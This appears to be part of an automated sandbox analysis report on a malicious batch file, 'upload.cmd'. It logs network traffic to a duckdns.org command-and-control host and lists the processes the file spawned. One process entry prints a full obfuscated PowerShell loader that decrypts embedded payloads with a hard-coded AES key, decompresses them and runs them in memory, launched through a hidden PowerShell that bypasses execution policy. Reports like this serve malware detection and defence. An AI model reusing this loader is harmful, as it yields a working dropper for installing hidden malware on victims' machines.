                              May 23, 2024 21:15:48.501457930 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.515273094 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.522311926 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.527137041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.582015991 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.633116007 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.679429054 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.679507971 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.684931040 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.716078043 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.727163076 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.732165098 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.755554914 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.814105988 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.845138073 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.971683025 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.971769094 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.038806915 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.044905901 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.057074070 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.107319117 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.107328892 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.155739069 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.156112909 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.290102959 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.385185957 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.388173103 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.701823950 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.752159119 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.755815983 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.760912895 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.803832054 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.808805943 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.884599924 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.977572918 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.977633953 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.056982994 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.062037945 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.095180035 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.100004911 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.161345959 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.164156914 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.169085026 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.249171972 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.293661118 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.382122040 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.474773884 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.475209951 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.332269907 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.337636948 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.513700962 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.518969059 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.523972034 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.662242889 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.667298079 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.708508015 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.817754030 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.837404013 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.850938082 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.854260921 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.949508905 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.949584961 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.954660892 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.013650894 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.093357086 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:53.098819017 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.147377968 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.191836119 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.195324898 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:53.284425974 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.411072969 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.412041903 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.153958082 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.201585054 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.201637983 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.206907988 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.247319937 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.252207041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.340960026 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.357180119 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.362210035 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.392139912 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.413161993 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.413435936 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.423208952 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.475614071 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.485841036 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.538755894 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.586807013 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.647835016 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.743336916 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.743355989 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.743391991 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.793008089 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.809294939 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.859299898 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.928031921 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.958081961 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.007587910 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:55.014149904 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.092657089 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.200067997 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:55.232897043 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.309428930 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:56.473444939 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:56.482058048 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:56.655563116 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:56.793807030 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:56.997558117 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.002597094 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.237687111 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.309315920 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.452334881 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.458388090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.486051083 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.491919041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.647878885 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.747672081 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.747807980 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.411432028 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.446376085 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.451508999 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.456597090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.618105888 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.625961065 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.630958080 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.635838985 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.640882969 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.710678101 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.809472084 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.850207090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.934645891 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.942678928 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:59.055193901 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.544766903 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.553581953 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.702147007 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.727688074 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.737605095 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.775778055 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.831330061 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.859926939 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.865106106 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.915396929 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.004642010 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.010304928 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.025506973 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.042376041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.042609930 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.089458942 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.089519978 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.100302935 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.124720097 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.130855083 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.187258005 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.194246054 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.200730085 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.247437000 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.293756008 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.358112097 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.404222965 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.471445084 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.543272018 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.551377058 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.216259003 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.268621922 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.395402908 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.510449886 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.560065985 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.629549980 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.640683889 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.744282007 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.786333084 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.838769913 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.843606949 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.848668098 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.903110027 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.905108929 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.960935116 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.961011887 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.965936899 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.023905039 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.069879055 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.075066090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.092533112 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.097547054 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.114770889 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.119826078 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.155982971 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.160923958 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.207282066 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.248150110 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.253098011 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.257811069 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.352768898 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.353116035 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.399219036 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.485162020 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.487787008 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.596590042 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.700103998 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:05.951406002 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:06.106743097 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.353575945 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.455487013 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.455581903 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.460980892 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.515336990 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.550564051 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.599350929 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.601552963 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.606491089 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.661026955 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.666112900 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.736763000 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.803745031 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.823812008 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.916465998 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.921529055 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:08.014694929 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:08.014765024 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:13.924449921 CEST497058896192.168.2.812.202.180.134

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 23, 2024 21:13:08.411286116 CEST5424053192.168.2.81.1.1.1
                              May 23, 2024 21:13:08.532054901 CEST53542401.1.1.1192.168.2.8
                              May 23, 2024 21:13:18.930941105 CEST53572901.1.1.1192.168.2.8

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              May 23, 2024 21:13:08.411286116 CEST192.168.2.81.1.1.10x45dfStandard query (0)xgmn934.duckdns.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              May 23, 2024 21:13:08.532054901 CEST1.1.1.1192.168.2.80x45dfNo error (0)xgmn934.duckdns.org12.202.180.134A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" "
                              Imagebase:0x7ff630480000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c "set __=^&rem"
                              Imagebase:0x7ff630480000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                              Imagebase:0x7ff630480000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
                              Imagebase:0x7ff6cb6b0000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:15:16:02
                              Start date:23/05/2024
                              Path:C:\Windows\System32\wermgr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0"
                              Imagebase:0x7ff61d450000
                              File size:229'728 bytes
                              MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Disassembly

                              No disassembly